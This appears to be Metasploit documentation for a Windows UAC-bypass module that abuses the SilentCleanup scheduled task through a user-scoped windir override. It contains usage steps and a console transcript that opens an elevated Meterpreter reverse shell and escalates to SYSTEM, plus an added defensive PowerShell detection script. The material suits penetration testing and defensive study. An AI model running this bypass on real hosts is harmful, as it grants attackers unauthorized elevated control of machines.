## Introduction
This module bypasses User Account Control (UAC) on Windows installations that ship the `SilentCleanup` scheduled task and have PowerShell available. It requires a session running as a user who is a member of the local Administrators group but whose token is the normal filtered (medium-integrity) one, and it returns a new session running with that user's full, high-integrity token.

The scheduled task `\Microsoft\Windows\DiskCleanup\SilentCleanup` is configured to run as the Users group with "Run with highest privileges". When a member of Administrators triggers it, the task therefore executes with the user's elevated token and no UAC prompt is shown.

The task's action is `%windir%\system32\cleanmgr.exe`. Because the task runs in the triggering user's own context, `%windir%` is expanded from that user's environment, and a user-scoped variable (under `HKCU\Environment`) takes precedence over the system-wide one. Redefining `windir` (normally `C:\Windows`) to point at attacker-controlled content makes the task execute that content with the elevated token. For this to work the payload must be saved to a script file on disk; it cannot be supplied directly as a PowerShell command line or from the Run dialog.
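The following PowerShell script is an added example, not part of the module or of its documentation. It verifies from a lab host the two facts the bypass depends on (the task's principal and run level, and that the caller holds a filtered administrator token) and then hunts for the one artifact the technique leaves behind, a user-scoped `windir` value. The task path `\Microsoft\Windows\DiskCleanup\SilentCleanup` is the real one; the function names and the output layout are my own. Only built-in tooling is used (the `ScheduledTasks` module and `whoami`).

```powershell
# Added example, not part of the module or this page.
# Checks the preconditions the SilentCleanup bypass relies on and hunts
# for the artifact it leaves (a user-scoped "windir" value). Run it from
# a normal, non-elevated PowerShell prompt on the host being examined.

$TaskPath = '\Microsoft\Windows\DiskCleanup\'   # real location of the task
$TaskName = 'SilentCleanup'

function Get-SilentCleanupConfig {
    # What the task runs and as whom. The bypass needs GroupId = Users,
    # RunLevel = Highest and an Execute string that goes through %windir%.
    $task   = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -ErrorAction Stop
    $action = $task.Actions[0]
    [pscustomobject]@{
        State      = $task.State
        GroupId    = $task.Principal.GroupId
        RunLevel   = $task.Principal.RunLevel
        Execute    = $action.Execute
        Arguments  = $action.Arguments
        UsesWindir = [bool]($action.Execute -match '(?i)%windir%')
    }
}

function Get-CallerTokenState {
    # Is the caller an unelevated local administrator? The filtered token
    # still carries S-1-5-32-544, flagged "used for deny only", plus the
    # Medium integrity label S-1-16-8192; an elevated token carries the
    # High label S-1-16-12288 instead.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $admin  = $groups | Where-Object SID -eq 'S-1-5-32-544'
    [pscustomobject]@{
        User          = (whoami)
        InAdminGroup  = [bool]$admin
        TokenFiltered = [bool]($admin -and $admin.Attributes -match 'deny only')
        Elevated      = [bool]($groups | Where-Object SID -eq 'S-1-16-12288')
    }
}

function Find-UserWindirOverride {
    # Windows defines windir only in the machine environment
    # (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment).
    # A "windir" value under any user's HKU\<SID>\Environment is never
    # legitimate and is the footprint this technique leaves. Other users'
    # hives are only readable when this script itself runs elevated.
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS) {
        if ($hive.PSChildName -like '*_Classes') { continue }
        $envKey = "Registry::HKEY_USERS\$($hive.PSChildName)\Environment"
        if (-not (Test-Path $envKey)) { continue }
        $v = Get-ItemProperty -Path $envKey -Name windir -ErrorAction SilentlyContinue
        if ($null -ne $v) {
            [pscustomobject]@{ UserSid = $hive.PSChildName; windir = $v.windir }
        }
    }
}

'== SilentCleanup task =='
Get-SilentCleanupConfig | Format-List
'== Caller token =='
Get-CallerTokenState | Format-List
'== User-scoped windir overrides (expect none) =='
$hits = @(Find-UserWindirOverride)
if ($hits.Count -eq 0) { 'none found' } else { $hits | Format-Table -AutoSize }
```

On a host where the bypass applies, the first block reports `GroupId = Users`, `RunLevel = Highest` and `UsesWindir = True`, and the second reports `InAdminGroup = True`, `TokenFiltered = True`, `Elevated = False`. The third block is the part worth scheduling as a recurring check: the module sets a user-scoped `windir` while it runs, so any hit there, or a `HKCU\Environment` write of `windir` in registry auditing, is a direct indicator of this technique.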
## Usage
1. Create a session on the target system in the context of a user who is a member of the local Administrators group. The session must be the normal, non-elevated (medium-integrity) one; an already elevated session has nothing to bypass.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_silentcleanup`.
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture matches the target. The payload runs in the PowerShell process that the task spawns, not in the original session's process, so a 64-bit payload works from a 32-bit session on a 64-bit host, as in the scenario below.
1. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.
## Scenarios
```
msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP  192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)

msf5 > use exploit/windows/local/bypassuac_silentcleanup
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    6                yes       The session to run this module on.
   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.1.xx:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) >
```